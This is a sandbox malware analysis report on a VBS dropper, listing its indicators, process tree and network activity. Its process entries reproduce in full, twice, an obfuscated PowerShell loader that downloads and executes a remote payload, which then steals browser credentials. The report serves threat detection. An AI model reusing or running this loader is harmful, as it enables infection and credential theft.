File name:

b84523feed02df1762ce3858529fe40234bbd9d023d105466e92c6bd0d20bc87.vbs

Full analysis: https://app.any.run/tasks/e877c99e-afec-43e2-acdd-9918c7773d5f
Verdict: Malicious activity
Analysis date: March 27, 2024, 07:08:46
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

E1825137FDD9E1E805275F004D9F442B

SHA1:

1477508C4AC6591B5EAA600B6D876A7B1C6AE501

SHA256:

B84523FEED02DF1762CE3858529FE40234BBD9D023D105466E92C6BD0D20BC87

SSDEEP:

3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hye:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 6492)

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 6312)

    • Steals credentials from Web Browsers

      • wab.exe (PID: 6312)

    • Actions looks like stealing of personal data

      • wab.exe (PID: 6312)

  • SUSPICIOUS

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 6492)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6492)
      • powershell.exe (PID: 3536)

    • Evaluates numerical expressions in cmd (potential data obfuscation)

      • powershell.exe (PID: 3536)
      • powershell.exe (PID: 2168)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6492)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3536)
      • powershell.exe (PID: 2168)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6492)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 6312)

    • Checks Windows Trust Settings

      • wab.exe (PID: 6312)

  • INFO

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 6312)

    • Checks proxy server information

      • slui.exe (PID: 4480)
      • wab.exe (PID: 6312)

    • Reads the computer name

      • wab.exe (PID: 6312)

    • Checks supported languages

      • wab.exe (PID: 6312)

    • Reads the software policy settings

      • wab.exe (PID: 6312)
      • slui.exe (PID: 4480)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 6312)

    • Creates files or folders in the user directory

      • wab.exe (PID: 6312)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs slui.exe wab.exe

Process information

PID
CMD
Path
Indicators
Parent process
2168"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Samarbejdets Programinstruktioner Lakeringerne Spiseres #>;$Sjlsstorheds=(cmd /c set /A 115^^0);Function Indviklinger ([String]$Gaffellfteren){$Sjlsstorheds=[char][int]$Sjlsstorheds;$Opladedes=$Sjlsstorheds+'ubstring';$uvet=8;$Afterplanting=Reprehensibleness28($Gaffellfteren);For($Programhovedernes60=7; $Programhovedernes60 -lt $Afterplanting; $Programhovedernes60+=$uvet){$Pectous=$Gaffellfteren.$Opladedes.Invoke($Programhovedernes60, 1);$Pirette=$Pirette+$Pectous;}$Pirette;}function birtes ($Fiskeriaftalerne){& ($Alkaptonuria237) ($Fiskeriaftalerne);}function Reprehensibleness28 ([String]$Blaze){$Politikomraader=$Blaze.Length-1;$Politikomraader;}$Ornamenteret=Indviklinger 'Anglik THippiemrCentrala KlnresnRipe,edsSu.phorfDampspre Byggehr,argangrDelphyniGunfighnFemini gSaavelb ';$Piankashaw=Indviklinger ' Mars yhSpejlintbrednint Calam pBremseksAkva,in: Spalie/V regru/Pos.noddAponeurrIndgraviAfstivevBearbejeBi.mage. TecstrgUn,faldoSbenforoSpndi.ggOutwhirlHintingeGennemp.ForttwacNucle.soChairwomViljest/.ageretuSundevec rhverv?FrontageNonequax Aggre,pLifeyp,oMotorburMalleabtsatrapp=Ha,kenid OverdeoearthbrwSamleven Nillinlstanglao Illustakl.ttagdFrygtls&SnnedatiKoalitidSa,ling=Automob1Os,illoM Sprites,eismolV se iorYMeri ne0CafeterTSkalar,b Requiei ,roklaCRho.boiNFornyerJMirnas Y attri,C T elypDSpredtecF skebap Verden2 Mana,em VrangvVUnilitegGofferefNoncateU FestprrNonsaleMNattevaR Procreh Gravs Z SpringIParaglob Coalieq RedninEFl,kkenxOxidise ';$Alkaptonuria237=Indviklinger 'LippieriNikkonaeSuccou x Res,st ';$Myggesvrme=Indviklinger 'I.ducer$forkantgstolennlBathooloAareladbs,ertetaDdsmesslTakethr:Korts,sBTredjemeKraftiggFishgigrZebeck eF,rsmdebMalersas LockiarLibanesaslutkammOverg.imHalvm keUnrecogrA.missenAtomspreIndsvbfsTycoona Ginseng=Ctenodu KlippevSShillabtSkaanepaundervirForsknit Tilb,g-BackgroBUnantiqiH,jjplutClappedsBrakvanT,hemophr ,absmoaEndevennQueryinsUnerranfNringsleNitrogerPran,er Daise,-Fre,kleSSpindleoFarvemeu iconogr Afs rec A,chatefamilie Lonny,l$FritidsP amilieiRestte.aFar sisnFundamekAtm,sfra SpissasGennembhInactuaaPot,momwKoagula Systemk-tidsramD hyperaeF,rielusbuddin tClinahfiAnmiensnRoyali.aGammaglt ,abiatiForskeroMemoratnSkasang Livst g$EfterpllV,ctorio oraner Mnio.deHoved.tnFaneborzPolitiak ElsemauOversupr SailorvPrecorne OculocsHydrog, ';birtes (Indviklinger 'K erwar$ HolophgRegion.lToridopoUnlifelbChibritaFaaresylPhonobs:TranscelLodecado .inylir EstroneFinerinnPeriodiz Aeolipk Fo lysu erhv rr Jublilv BundbieResummos Fa.ser= Aften $Familise,agbordn EpicravStartup:Knickera Udgangp,ktielnpEndothedParatroaAntepentAppleria aarsa ') ;birtes (Indviklinger 'OverlavIMillin mdign fypBeaujoloKrak forRunedcatLogi.pr-Affal sMVacantho EmotivdGennemsuSacrifilFjerkrae Betale LibanotBBriber.iAffjedrtHaandsks DeceleTspidsharNonsa.iaVvestolnStnge.ksKl.mskrfOpprioreSands orpumpkin ') ;$lorenzkurves=$lorenzkurves+'\Turboblower.Tip' ;birtes (Indviklinger ' einric$AbsentagdobbeltlAnbefaloRefacesbDrtt.tdaOsmazoml.upposi:Applin RReceptueUlnnedegChimpsfoPolygalr TissemgSmr aase.ankeaasRe,iabl=Hvilene(PropulsTPr.grameFixatifsPrateddt Me,kan-PseudogP Entr laHyp.rmetRepo arhFremhve Raisers$ pistrlForstrroFagklasr Satlije sy asknBalletdzSlutstrkRowelheuRefuserr PrevenvMesodonePoe.icasHavbio.)Un.erda ') ;while (-not $Regorges) {birtes (Indviklinger 'UnfluxiIMarxistfAabning Skabekr(I,diffe$ FirtalBNondis.eBarmclogTogolesrByggelaestyretebudtnknis chordarRhetorsaSecuricmFod,otemWicopieeQuadra.rCistercnWhampeeeAffaites Kirkif. MonochJFre chio OverdibKandissSMultir,tEtkammeaFran ultSpk.ebreLekture Fistula- BlodpreZoogeogqSen.ekl Tagunde$ OptaelOSpandevrGiliakfnvandbeha ChicahmColluctestraalinSigmatit.etektie PhonetrUnsabereSo enoctPjatteh)Carb.ne Vise.e{ ForefiSMell.mhtTubernea Auto hrHermitatVexilla-HanifafSTrantorl Roker.e K.inike EksponpAntagon Uforfr1Sporvej} SumpmeeDemonstlMiguelssSeerespeSubp.og{Lske riS St atetTra,tilaSeborrhrMaculattRangxnr-Devis.rS OpponelFroghopeM,ssioneKipagetpIngraob st rsle1Greenin;NakkekabordfreriSm kkesrDifferet,lseblgeA,seltasManumit Udbindi$resprouMJoedindy RotatigPhy,optgFyldebteLoviersssaltarevEvitesvrMetallim,ntendee Brevst}Ferrel, ');birtes (Indviklinger 'Ve.gern$SpecifigSubalt,lDri.teno ReacclbHusarr,aIntersplSph nop: iamidRA.inetienonsubsgMappenhoNettil rIsotonigdansktoeUtaalelssmrfedt= ,atafr( LocoisTInddatae GolconsF rvefotMedmen -NedskriP Predela krs.lstCodifichDatade Dipusko$ Autoecl Fang,noTanzanirKompleteMistbownRe,ativzParag,ak SlekenuTadpoler Vitr,nvGammoneeDriftsksstyklis)Venth,l ') ;}birtes (Indviklinger 'Unrosed$Unn,viggC,nnamalInterploUsiasrkb HornwoaDefalcalJokistl: HelbreF ArmpitoPindan,r Fl rbrsF.rmulaaDraughtmO.thopll PositiiSifflotnP,rithegVaskemisSummatis TearpiaVisne.eludsiges Duskl.d=Andejag Azor rGEmboli,e BordsktPrfikse-atmometCFluvioloSkimmelnPiolet tLeperileUngovernVildt etKoncept Sand,le$.hefoprlTopatopo UnscatrBilatereHyperoxnDyretmmzPres,nikIncludiuKa,alysrApterervDollarfeDistruss Lit er ');birtes (Indviklinger 'kujo.er$MosendegForbr,glCab.homoKreditvbErklaeraKrakilelAngiorr:undiverT DeponeiHy eroxpKaffehaoSwepgrnlAbsentedPreforgeDiorthomGenkendoKonc.rtdOve asseStuderer Digita Geomagn= Phyla. Bedegar[ MennesSUnderviyLandbrusBukhfljtRespecte lausurm k mmes.LynjustCbl.ehatoUsufrucn RytmesvBramfr e Ult amrkiriscrtForhaan]M.cunag:Me,amps:TeodoliFBere.terIsoxyleoBetingemSwargaeBEndothia I.terlsBe,outheGa ping6V.lerto4MisstatSFordrm,tMisseatr Impreci IndkomnA.ersheg Tootha(Hold re$ Detac.FDisembroH.vedsprSkridtksPre,isgaDivergem TestimlTidsvrdi .lgiernMedsstegtampionsSekskansWatchleaBunkrinlTroskab)Deviati ');birtes (Indviklinger 'Stendys$ ArvemogPropagul Vi.ratoAirbornbAcocantaPraestelClarin,: RethavVLieniceiInterlorFeltstrk tongssehjerte.mBundfa i Labo.adRidse,adFormkage.ppelkolKattefje Flanr tDi cabis Maroon Tmmervr=Hu.terb otryc[FlotatiSFri.ureyJazzmussBeduinetsv terne TrampemUndersk.BalanceT Trskere Okk,rfxSkattegtCapital.HeltalsE frostvnIgan.stcSy,esaloDeepfredSubdorsiH,gnstrnArrectdg pasmop]Mothers:Ir,nike:Jou nalA,irtheeSSquasheC FankluIMilj ynICentral.AbyssapGHidfrkie TrajectSpringbSS,oppegtTvtningrCat.ectiRhinorrn UdbulegN,nradi( ftneti$HyperkaT IntereiDisposip ForplioTepid.rlAutarkidRestauresamo armMarantioAdvisetdFstnelseOvermtnrPedolog) .usico ');birtes (Indviklinger 'Rhodosp$ Criti gReshowslPhilhymoMindstbbSnohal aD,taskolBagstrb:,rackenBKali,mkiFlokinsb afholdlKo.troliKrybskyoHeptan.pMorderieStyrtdygDeceleriShippinsMangrovtjag.fai=Venogra$TraduciVUniversiBrystoprUdpolstkY.gelplePullalum PrivatiBurgundd,xanthed Tekstle AppliklannemoneTerpenotTessellsSinkin,.Sh.enyus TechniuKnejp,ub InsinusdiagonatD ctordrFri.gleiA,minolnUnwrin,gB nitet(To ilsm3genindt2lokalne1Semipne7Paul,te6Cuemans2Solcell,Slangeb3Fiction1H.mmers8,iarrfz6Eyvinte5Spaltet) Stofmi ');birtes $Bibliopegist;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3536"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Samarbejdets Programinstruktioner Lakeringerne Spiseres #>;$Sjlsstorheds=(cmd /c set /A 115^^0);Function Indviklinger ([String]$Gaffellfteren){$Sjlsstorheds=[char][int]$Sjlsstorheds;$Opladedes=$Sjlsstorheds+'ubstring';$uvet=8;$Afterplanting=Reprehensibleness28($Gaffellfteren);For($Programhovedernes60=7; $Programhovedernes60 -lt $Afterplanting; $Programhovedernes60+=$uvet){$Pectous=$Gaffellfteren.$Opladedes.Invoke($Programhovedernes60, 1);$Pirette=$Pirette+$Pectous;}$Pirette;}function birtes ($Fiskeriaftalerne){& ($Alkaptonuria237) ($Fiskeriaftalerne);}function Reprehensibleness28 ([String]$Blaze){$Politikomraader=$Blaze.Length-1;$Politikomraader;}$Ornamenteret=Indviklinger 'Anglik THippiemrCentrala KlnresnRipe,edsSu.phorfDampspre Byggehr,argangrDelphyniGunfighnFemini gSaavelb ';$Piankashaw=Indviklinger ' Mars yhSpejlintbrednint Calam pBremseksAkva,in: Spalie/V regru/Pos.noddAponeurrIndgraviAfstivevBearbejeBi.mage. TecstrgUn,faldoSbenforoSpndi.ggOutwhirlHintingeGennemp.ForttwacNucle.soChairwomViljest/.ageretuSundevec rhverv?FrontageNonequax Aggre,pLifeyp,oMotorburMalleabtsatrapp=Ha,kenid OverdeoearthbrwSamleven Nillinlstanglao Illustakl.ttagdFrygtls&SnnedatiKoalitidSa,ling=Automob1Os,illoM Sprites,eismolV se iorYMeri ne0CafeterTSkalar,b Requiei ,roklaCRho.boiNFornyerJMirnas Y attri,C T elypDSpredtecF skebap Verden2 Mana,em VrangvVUnilitegGofferefNoncateU FestprrNonsaleMNattevaR Procreh Gravs Z SpringIParaglob Coalieq RedninEFl,kkenxOxidise ';$Alkaptonuria237=Indviklinger 'LippieriNikkonaeSuccou x Res,st ';$Myggesvrme=Indviklinger 'I.ducer$forkantgstolennlBathooloAareladbs,ertetaDdsmesslTakethr:Korts,sBTredjemeKraftiggFishgigrZebeck eF,rsmdebMalersas LockiarLibanesaslutkammOverg.imHalvm keUnrecogrA.missenAtomspreIndsvbfsTycoona Ginseng=Ctenodu KlippevSShillabtSkaanepaundervirForsknit Tilb,g-BackgroBUnantiqiH,jjplutClappedsBrakvanT,hemophr ,absmoaEndevennQueryinsUnerranfNringsleNitrogerPran,er Daise,-Fre,kleSSpindleoFarvemeu iconogr Afs rec A,chatefamilie Lonny,l$FritidsP amilieiRestte.aFar sisnFundamekAtm,sfra SpissasGennembhInactuaaPot,momwKoagula Systemk-tidsramD hyperaeF,rielusbuddin tClinahfiAnmiensnRoyali.aGammaglt ,abiatiForskeroMemoratnSkasang Livst g$EfterpllV,ctorio oraner Mnio.deHoved.tnFaneborzPolitiak ElsemauOversupr SailorvPrecorne OculocsHydrog, ';birtes (Indviklinger 'K erwar$ HolophgRegion.lToridopoUnlifelbChibritaFaaresylPhonobs:TranscelLodecado .inylir EstroneFinerinnPeriodiz Aeolipk Fo lysu erhv rr Jublilv BundbieResummos Fa.ser= Aften $Familise,agbordn EpicravStartup:Knickera Udgangp,ktielnpEndothedParatroaAntepentAppleria aarsa ') ;birtes (Indviklinger 'OverlavIMillin mdign fypBeaujoloKrak forRunedcatLogi.pr-Affal sMVacantho EmotivdGennemsuSacrifilFjerkrae Betale LibanotBBriber.iAffjedrtHaandsks DeceleTspidsharNonsa.iaVvestolnStnge.ksKl.mskrfOpprioreSands orpumpkin ') ;$lorenzkurves=$lorenzkurves+'\Turboblower.Tip' ;birtes (Indviklinger ' einric$AbsentagdobbeltlAnbefaloRefacesbDrtt.tdaOsmazoml.upposi:Applin RReceptueUlnnedegChimpsfoPolygalr TissemgSmr aase.ankeaasRe,iabl=Hvilene(PropulsTPr.grameFixatifsPrateddt Me,kan-PseudogP Entr laHyp.rmetRepo arhFremhve Raisers$ pistrlForstrroFagklasr Satlije sy asknBalletdzSlutstrkRowelheuRefuserr PrevenvMesodonePoe.icasHavbio.)Un.erda ') ;while (-not $Regorges) {birtes (Indviklinger 'UnfluxiIMarxistfAabning Skabekr(I,diffe$ FirtalBNondis.eBarmclogTogolesrByggelaestyretebudtnknis chordarRhetorsaSecuricmFod,otemWicopieeQuadra.rCistercnWhampeeeAffaites Kirkif. MonochJFre chio OverdibKandissSMultir,tEtkammeaFran ultSpk.ebreLekture Fistula- BlodpreZoogeogqSen.ekl Tagunde$ OptaelOSpandevrGiliakfnvandbeha ChicahmColluctestraalinSigmatit.etektie PhonetrUnsabereSo enoctPjatteh)Carb.ne Vise.e{ ForefiSMell.mhtTubernea Auto hrHermitatVexilla-HanifafSTrantorl Roker.e K.inike EksponpAntagon Uforfr1Sporvej} SumpmeeDemonstlMiguelssSeerespeSubp.og{Lske riS St atetTra,tilaSeborrhrMaculattRangxnr-Devis.rS OpponelFroghopeM,ssioneKipagetpIngraob st rsle1Greenin;NakkekabordfreriSm kkesrDifferet,lseblgeA,seltasManumit Udbindi$resprouMJoedindy RotatigPhy,optgFyldebteLoviersssaltarevEvitesvrMetallim,ntendee Brevst}Ferrel, ');birtes (Indviklinger 'Ve.gern$SpecifigSubalt,lDri.teno ReacclbHusarr,aIntersplSph nop: iamidRA.inetienonsubsgMappenhoNettil rIsotonigdansktoeUtaalelssmrfedt= ,atafr( LocoisTInddatae GolconsF rvefotMedmen -NedskriP Predela krs.lstCodifichDatade Dipusko$ Autoecl Fang,noTanzanirKompleteMistbownRe,ativzParag,ak SlekenuTadpoler Vitr,nvGammoneeDriftsksstyklis)Venth,l ') ;}birtes (Indviklinger 'Unrosed$Unn,viggC,nnamalInterploUsiasrkb HornwoaDefalcalJokistl: HelbreF ArmpitoPindan,r Fl rbrsF.rmulaaDraughtmO.thopll PositiiSifflotnP,rithegVaskemisSummatis TearpiaVisne.eludsiges Duskl.d=Andejag Azor rGEmboli,e BordsktPrfikse-atmometCFluvioloSkimmelnPiolet tLeperileUngovernVildt etKoncept Sand,le$.hefoprlTopatopo UnscatrBilatereHyperoxnDyretmmzPres,nikIncludiuKa,alysrApterervDollarfeDistruss Lit er ');birtes (Indviklinger 'kujo.er$MosendegForbr,glCab.homoKreditvbErklaeraKrakilelAngiorr:undiverT DeponeiHy eroxpKaffehaoSwepgrnlAbsentedPreforgeDiorthomGenkendoKonc.rtdOve asseStuderer Digita Geomagn= Phyla. Bedegar[ MennesSUnderviyLandbrusBukhfljtRespecte lausurm k mmes.LynjustCbl.ehatoUsufrucn RytmesvBramfr e Ult amrkiriscrtForhaan]M.cunag:Me,amps:TeodoliFBere.terIsoxyleoBetingemSwargaeBEndothia I.terlsBe,outheGa ping6V.lerto4MisstatSFordrm,tMisseatr Impreci IndkomnA.ersheg Tootha(Hold re$ Detac.FDisembroH.vedsprSkridtksPre,isgaDivergem TestimlTidsvrdi .lgiernMedsstegtampionsSekskansWatchleaBunkrinlTroskab)Deviati ');birtes (Indviklinger 'Stendys$ ArvemogPropagul Vi.ratoAirbornbAcocantaPraestelClarin,: RethavVLieniceiInterlorFeltstrk tongssehjerte.mBundfa i Labo.adRidse,adFormkage.ppelkolKattefje Flanr tDi cabis Maroon Tmmervr=Hu.terb otryc[FlotatiSFri.ureyJazzmussBeduinetsv terne TrampemUndersk.BalanceT Trskere Okk,rfxSkattegtCapital.HeltalsE frostvnIgan.stcSy,esaloDeepfredSubdorsiH,gnstrnArrectdg pasmop]Mothers:Ir,nike:Jou nalA,irtheeSSquasheC FankluIMilj ynICentral.AbyssapGHidfrkie TrajectSpringbSS,oppegtTvtningrCat.ectiRhinorrn UdbulegN,nradi( ftneti$HyperkaT IntereiDisposip ForplioTepid.rlAutarkidRestauresamo armMarantioAdvisetdFstnelseOvermtnrPedolog) .usico ');birtes (Indviklinger 'Rhodosp$ Criti gReshowslPhilhymoMindstbbSnohal aD,taskolBagstrb:,rackenBKali,mkiFlokinsb afholdlKo.troliKrybskyoHeptan.pMorderieStyrtdygDeceleriShippinsMangrovtjag.fai=Venogra$TraduciVUniversiBrystoprUdpolstkY.gelplePullalum PrivatiBurgundd,xanthed Tekstle AppliklannemoneTerpenotTessellsSinkin,.Sh.enyus TechniuKnejp,ub InsinusdiagonatD ctordrFri.gleiA,minolnUnwrin,gB nitet(To ilsm3genindt2lokalne1Semipne7Paul,te6Cuemans2Solcell,Slangeb3Fiction1H.mmers8,iarrfz6Eyvinte5Spaltet) Stofmi ');birtes $Bibliopegist;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
4120"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
4132"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4480C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
4844\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6312"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
6492"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\b84523feed02df1762ce3858529fe40234bbd9d023d105466e92c6bd0d20bc87.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 413
Read events
17 378
Write events
35
Delete events
0

Modification events

(PID) Process:(6492) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6492) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6492) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6492) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3536) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3536) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3536) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3536) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2168) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2168) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
6
Text files
6
Unknown types
6

Dropped files

PID
Process
Filename
Type
6492wscript.exeC:\Users\admin\AppData\Local\Temp\Udforingen.txttext
MD5:
SHA256:
3536powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2cjqw55k.tlg.ps1text
MD5:
SHA256:
3536powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uknns4db.dkz.psm1text
MD5:
SHA256:
2168powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z5mncscl.fw1.ps1text
MD5:
SHA256:
2168powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xoznpcgi.vud.psm1text
MD5:
SHA256:
2168powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:
SHA256:
6312wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:
SHA256:
6312wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:
SHA256:
6312wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:
SHA256:
6312wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
53
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2872
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
2872
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
392
backgroundTaskHost.exe
GET
200
192.229.221.95:80
